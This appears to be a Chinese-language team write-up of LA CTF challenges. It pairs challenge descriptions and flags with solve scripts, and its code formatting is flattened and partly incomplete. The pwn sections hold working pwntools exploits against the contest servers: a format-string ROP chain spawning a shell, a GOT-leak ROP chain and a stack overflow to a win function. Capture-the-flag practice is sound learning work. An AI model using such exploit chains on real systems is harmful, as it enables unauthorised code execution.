Metaenter the metaverse and metapost about metathings. All you have to metado is metaregister for a metaaccount and you’re good to metago. https://metaverse.lac.tf/ You can metause our fancy new metaadmin metabot to get the admin to metaview your metapost!
解题思路
g0at:应该是有人(zhanyi✌)打穿了,鼠鼠直接捡漏,账号密码123就直接进去了捏
college-tour
题目说明
Welcome to UCLA! To explore the #1 public college, we have prepared a scavenger hunt for you to walk all around the beautiful campus.
解题思路
到处找flag就行了 lactf{j03_4nd_j0S3phIn3_bRU1n_sAY_hi}
Pwn
rut-roh-relro
题目说明
My friend keeps writing super insecure C programs but I’m too lazy to fix his code. I’m sure it’ll be fine as long as I use enough exploit mitigations, right? nc lac.tf 31134
g = fmtstr_g(6, {ret_stack:pop_rdi_ret,ret_stack+8:bin_sh,ret_stack+0x10:system_addr}, write_size='byte') p.sendlineafter("What would you like to post?",pg)
p.interactive()
redact
题目说明
I heard C was insecure so I wrote my flag redactor program in C++. nc lac.tf 31281 Note: There are multiple optimized implementations of memmove and one is selected at runtime based on available CPU features, meaning that any solution that uses the memmove GOT entry could fail on remote. The challenge is solvable without memmove.
# dbg(src) g='a' p.sendlineafter("Enter some text: ",g)
g=b'b'*0x48+p64(pop_rdi_ret)+p64(0x4040C0)+p64(pop_rsi_r15_ret)+p64(0x403FE8)+p64(0)+p64(0x4010C0)+p64(start_addr) p.sendlineafter("Enter a placeholder: ",g)
index = 0 p.sendlineafter("Enter the index of the stuff to redact: ",str(index))
g=b'b'*0x48+p64(pop_rdi_ret)+p64(bin_sh)+p64(system_addr) p.sendlineafter("Enter a placeholder: ",g) index = 0 p.sendlineafter("Enter the index of the stuff to redact: ",str(index))
p.interactive()
gatekeep
题目说明
If I gaslight you enough, you won’t be able to get my flag! :) nc lac.tf 31121 Note: The attached binary is the exact same as the one executing on the remote server.
解题思路
g0at:一眼丁真的签到题 主函数,调用了check()函数,跟一下 逻辑也很简单,让猜密码,密码正确就可以print_flag()但是gets()这里有很明显的溢出,可以看到char s1[15],所以我们只要输入一个大的数就可以直接绕过check()函数,直接cat flag
bot
题目说明
I made a bot to automatically answer all of your questions. nc lac.tf 31180
解题步骤
1 2 3 4 5 6 7 8 9 10 11
#!/usr/bin/env python3 from pwn import *
p = remote("lac.tf", 31180) p.recv() g = b"may i have the flag?\0" g += b"A"*(64-len(g)) g += b'BBBBBBBB' g += p64(0x40129a) p.sendline(g) p.interactive()
I heard the onetime pad is perfectly secure so I used it to send an important message to a friend, but now a UCLA competition is asking for the key? I threw that out a long time ago! Can you help me recover it?
1 2 3 4 5 6 7 8 9 10 11 12 13
from itertools import cycle pt = b"Long ago, the four nations lived together in harmony ..."
key = cycle(b"lactf{??????????????}")
ct = ""
for i inrange(len(pt)): b = (pt[i] ^ next(key)) ct += f'{b:02x}' print("ct =", ct)
from Crypto.Util.number import* pt = b"Long ago, the four nations lived together in harmony ..." ct = 0x200e0d13461a055b4e592b0054543902462d1000042b045f1c407f18581b56194c150c13030f0a5110593606111c3e1f5e305e174571431e ct=long_to_bytes(int(ct))
for i inrange(len(ct)): flag = (pt[i] ^ ct[i]) print(chr(flag),end='') #lactf{b4by_h1t_m3_0ne_m0r3_t1m3}
chinese-lazy-theorem-1
题目说明
I heard about this cool theorem called the Chinese Remainder Theorem, but, uh… I’m feeling kinda tired right now. nc lac.tf 31110
from Crypto.Util.number import getPrime from Crypto.Random.random import randint
p = getPrime(512) q = getPrime(512) n = p*q
target = randint(1, n)
used_oracle = False
print(p) print(q)
print("To quote Pete Bancini, \"I'm tired.\"") print("I'll answer one modulus question, that's it.") whileTrue: print("What do you want?") print("1: Ask for a modulus") print("2: Guess my number") print("3: Exit") response = input(">> ")
if response == "1": if used_oracle: print("too lazy") print() else: modulus = input("Type your modulus here: ") modulus = int(modulus) if modulus <= 0: print("something positive pls") print() else: used_oracle = True print(target%modulus) print() elif response == "2": guess = input("Type your guess here: ") ifint(guess) == target: withopen("flag.txt", "r") as f: print(f.readline()) else: print("nope") exit() else: print("bye") exit()
解题思路
print(target%modulus)令modulus大于target就可以泄露target
rolling in the mud
题目说明
uugh, these pigs in my pen are making a complete mess! They’re rolling all over the place! Anyway, can you decode this cipher they gave me, almost throwing it at me while rolling around? Answer in lowercase with symbols. In the image, { and } are characters that should appear in your flag, and replace spaces with _.
You think you’ve seen all of the “classic” ciphers? Instead of your standard cipher, I’ve created my own cipher: the monoalphagreek cipher! Answer with just the flag in lowercase with symbols left in.
I’m trying out for this new game show, but it doesn’t seem that hard since there are only two choices? Regardless, I heard someone name Pollard could help me out with it?
import random from Crypto.Util.number import getPrime
n = 43799663339063312211273714468571591746940179019655418145595314556164983756585900662541462573429625012257141409310387298658375836921310691578072985664621716240663221443527506757539532339372290041884633435626429390371850645743643273836882575180662344402698999778971350763364891217650903860191529913028504029597794358613653479290767790778510701279503128925407744958108039428298936189375732992781717888915493080336718221632665984609704015735266455668556495869437668868103607888809570667555794011994982530936046877122373871458757189204379101886886020141036227219889443327932080080504040633414853351599120601270071913534530651
a = 6
print("n = ", n) print("a = ", 6)
for i inrange(150): bit = random.randrange(0,2) c = random.randrange(0, n) c = c**2 if bit == 1: c *= a print("c = ", c) guess = int(input("What is your guess? ")) if guess != bit: print("Better luck next time!") exit()
print("Congrats! Here's your flag: ") flag = open("flag.txt", "r").readline().strip() print(flag) exit(0)
from pwn import * from sympy.ntheory.primetest import is_square
p = remote('lac.tf', 31190) p.recvline() p.recvline()
C = 0
while C != 150: c = int((p.recvline().decode()).split(" ")[-1]) if c%6 == 0and is_square(c//6): p.sendline(b"1") else: p.sendline(b"0") C += 1 print(C,end="\r") print(p.recv(1024)) print(p.recv(1024))
from Crypto.Util.number import getPrime from Crypto.Random.random import randint
p = getPrime(512) q = getPrime(512) n = p*q*2*3*5
target = randint(1, n)
oracle_uses = 0
print(p) print(q)
print("This time I'll answer 2 modulus questions and give you 30 guesses.") whileTrue: print("What do you want?") print("1: Ask for a modulus") print("2: Guess my number") print("3: Exit") response = input(">> ")
from pwn import * from sympy.ntheory.modular import crt
with remote("lac.tf", 31111) as r: p = int(r.readline(False)) q = int(r.readline(False)) r.sendline(b"1") r.readuntil(b"Type your modulus here: ") r.sendline(str(p).encode()) x = int(r.readline(False)) r.sendline(b"1") r.readuntil(b"Type your modulus here: ") r.sendline(str(q).encode()) y = int(r.readline(False)) a, b = crt([p,q],[x,y]) r.sendline(b"2") for i inrange(30): r.readuntil(b"Type your guess here: ") r.sendline(str(a+i*b).encode()) print(r.readline())
Misc
CATS!
题目说明
CATS OMG I CAN’T BELIEVE HOW MANY CATS ARE IN THIS IMAGE I NEED TO VISIT CAN YOU FIGURE OUT THE NAME OF THIS CAT HEAVEN? Answer is the domain of the website for this location. For example, if the answer was ucla, the flag would be lactf{ucla.edu}.
Where was this photo taken? I think it used to be in the original photo, but someone cropped it out! The flag is lactf{location}, where location is the name of the POI that this person hiked up to, all lowercase and replacing spaces with underscrolls. Use the google maps name of the POI: for example, if the solution is the UCLA Bruin Bear statue, this is the google maps location, and the flag would be lactf{bruin_statue}. Please note: contacting anyone or any organization beyond official LA CTF support channels regarding this challenge is against the rules. Please be respectful of those who are involved in this challenge.
I found this google sheets link on the internet. I’m sure it’s hiding something, but I can’t find anything? Can you find the flag? Choose any link (they’re all the same): Link 1Link 2Link 3
解题思路
flag在另一个Sheet但我们没有查看权限 经过查资料发现Google表格的IMPORTRANGE函数可以做到倒入内容这一点。 所以直接get flag
ECB
题目说明
I was trying to send a flag to my friend over UDP, one character at a time, but it got corrupted! I think someone else was messing around with me and sent extra bytes, though it seems like they actually abided by RFC 3514 for once. Can you get the flag?
My friend sent me this message link that apparently links to a “flag”, but discord says “You don’t have access to this link”! They did mention something about them being able to embed a list of online users on their own website, and sent me this image. Can you figure out how to join the server? Note: Discord phone verification is NOT required for this challenge.
解题思路
题目给了一个discord链接 [https://discord.com/channels/1060030874722259057/1060030875187822724/1060031064669700186](https://discord.com/channels/1060030874722259057/1060030875187822724/1060031064669700186) https://discord.com/blog/add-the-discord-widget-to-your-site/ 在这篇文章中找到关键图片 图片下面看到用于 JSON API的URL。在给定的 URL 中,第一个 ID ( 1060030874722259057) 指的是服务器,因此我们将其放在图像中示例 ID 的位置。这给了我们链接 [https://discordapp.com/api/servers/1060030874722259057/widget.json](https://discordapp.com/api/servers/1060030874722259057/widget.json) 打开之后发现是个邀请链接,打开之后进入LA CTF-Chall Server 5服务器,就可以看到flag了
